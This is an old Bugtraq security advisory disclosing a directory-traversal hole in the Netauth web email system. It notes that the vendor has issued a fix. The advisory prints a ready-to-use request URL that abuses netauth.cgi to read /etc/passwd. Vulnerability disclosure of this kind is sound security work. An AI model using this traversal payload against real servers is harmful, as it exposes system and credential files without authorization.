Date: Thu, 17 Aug 2000 12:11:17 +0100 From: Marc Maiffret <marc@EEYE.COM> Subject: Netauth: Web Based Email Management System To: BUGTRAQ@SECURITYFOCUS.COM This is just a quick note of a simple hole in the Netauth system. What is Netauth? Netauth is a web based eMail management system for Windows NT and most Unix platforms. What is the hole? The nethauth.cgi file http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../.. /etc/passwd What is the fix? The Netauth developers (very cool guys) fixed this whole a few months back. So just go to their website and download the latest version. Vendor Homepage: http://netwinsite.com/netauth/ We found this hole while testing CHAM HTTP, few more weeks till release. http://www.eeye.com/retina Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.349.9062 F.949.349.9538 http://eEye.com